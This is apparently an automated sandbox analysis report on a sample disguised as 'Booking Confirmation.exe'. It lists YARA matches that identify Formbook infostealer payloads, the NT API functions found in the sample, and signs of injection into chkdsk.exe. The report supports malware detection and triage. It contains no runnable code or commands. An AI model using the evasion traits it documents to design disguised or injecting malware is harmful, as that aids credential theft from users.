            Source: Yara matchFile source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            .NET source code contains very large stringsShow sources
            Source: Booking Confirmation.exe, LogIn.csLong String: Length: 13656
            Source: 0.0.Booking Confirmation.exe.2c0000.0.unpack, LogIn.csLong String: Length: 13656
            Source: 0.2.Booking Confirmation.exe.2c0000.0.unpack, LogIn.csLong String: Length: 13656
            Source: 4.0.Booking Confirmation.exe.2d0000.0.unpack, LogIn.csLong String: Length: 13656
            Source: 4.2.Booking Confirmation.exe.2d0000.0.unpack, LogIn.csLong String: Length: 13656
            Source: 5.0.Booking Confirmation.exe.dc0000.0.unpack, LogIn.csLong String: Length: 13656
            Source: 5.2.Booking Confirmation.exe.dc0000.1.unpack, LogIn.csLong String: Length: 13656
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_00419D60 NtCreateFile,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_00419E10 NtReadFile,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_00419E90 NtClose,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_00419F40 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_00419D62 NtCreateFile,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_00419D1C NtCreateFile,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_00419DB2 NtReadFile,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_00419E0A NtReadFile,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A98F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A95D0 NtClose,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A97A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A99D0 NtCreateProcessEx,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9950 NtQueueApcThread,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A98A0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9820 NtEnumerateKey,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018AB040 NtSuspendThread,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018AA3B0 NtGetContextThread,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9B00 NtSetValueKey,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9A80 NtOpenDirectoryObject,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9A10 NtQuerySection,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A95F0 NtQueryInformationFile,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9520 NtWaitForSingleObject,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018AAD30 NtSetContextThread,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9560 NtWriteFile,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9FE0 NtCreateMutant,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018AA710 NtOpenProcessToken,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9730 NtQueryVirtualMemory,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9760 NtOpenProcess,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018AA770 NtOpenThread,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9770 NtSetInformationFile,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A96D0 NtCreateKey,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9610 NtEnumerateValueKey,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9650 NtQueryValueKey,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A9670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D295D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D296D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D296E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D299A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D295F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29560 NtWriteFile,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D2AD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D297A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D2A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D2A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D298F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D298A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D2B040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D299D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D2A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D29B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04339D60 NtCreateFile,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04339E10 NtReadFile,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04339E90 NtClose,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04339F40 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04339D1C NtCreateFile,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04339D62 NtCreateFile,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04339DB2 NtReadFile,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04339E0A NtReadFile,
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 0_2_0247C2B0
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 0_2_02479990
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 0_2_002C379D
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 4_2_002D379D
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_00401030
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0041E212
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0041D306
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_00402D90
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0041E5B7
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0041E5BA
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_00409E40
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_00409E3B
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0041CFA6
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_00402FB0
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0186F900
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01884120
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0187B090
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018920A0
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_019320A8
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_019328EC
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01921002
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0193E824
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189EBB0
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0192DBD2
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01932B28
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_019322AE
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01892581
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_019325DD
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0187D5E0
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01932D07
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01860D20
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01931D55
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0187841F
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0192D466
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01931FF1
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01932EF7
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0192D616
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01886E30
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_00DC379D
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DAD466
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF841F
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB25DD
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CFD5E0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D12581
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB1D55
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB2D07
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE0D20
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB2EF7
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DAD616
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D06E30
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB1FF1
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB28EC
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CFB090
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D120A0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB20A8
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DA1002
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DBE824
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CEF900
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D04120
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB22AE
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DADBD2
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1EBB0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB2B28
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0433E5BA
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04322D90
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04329E3B
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04329E40
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04322FB0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0433CFA6
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0433E212
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0433D306
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 04CEB150 appears 35 times
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: String function: 0186B150 appears 35 times
            Source: Booking Confirmation.exeBinary or memory string: OriginalFilename vs Booking Confirmation.exe
            Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameriched20.dllp( vs Booking Confirmation.exe
            Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmpBinary or memory string: k,\\StringFileInfo\\000004B0\\OriginalFilename vs Booking Confirmation.exe
            Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAsyncState.dllF vs Booking Confirmation.exe
            Source: Booking Confirmation.exe, 00000000.00000000.646928778.00000000002C2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIConnectionPoint.exe6 vs Booking Confirmation.exe
            Source: Booking Confirmation.exe, 00000000.00000002.676504964.0000000006D10000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Booking Confirmation.exe
            Source: Booking Confirmation.exe, 00000000.00000002.676596861.0000000006E90000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLegacyPathHandling.dllN vs Booking Confirmation.exe
            Source: Booking Confirmation.exeBinary or memory string: OriginalFilename vs Booking Confirmation.exe
            Source: Booking Confirmation.exe, 00000004.00000002.668906261.00000000002D2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIConnectionPoint.exe6 vs Booking Confirmation.exe
            Source: Booking Confirmation.exeBinary or memory string: OriginalFilename vs Booking Confirmation.exe
            Source: Booking Confirmation.exe, 00000005.00000002.710355206.000000000195F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Booking Confirmation.exe
            Source: Booking Confirmation.exe, 00000005.00000002.710181246.00000000015BC000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs Booking Confirmation.exe
            Source: Booking Confirmation.exe, 00000005.00000002.709572293.0000000000DC2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIConnectionPoint.exe6 vs Booking Confirmation.exe
            Source: Booking Confirmation.exeBinary or memory string: OriginalFilenameIConnectionPoint.exe6 vs Booking Confirmation.exe
            Source: Booking Confirmation.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
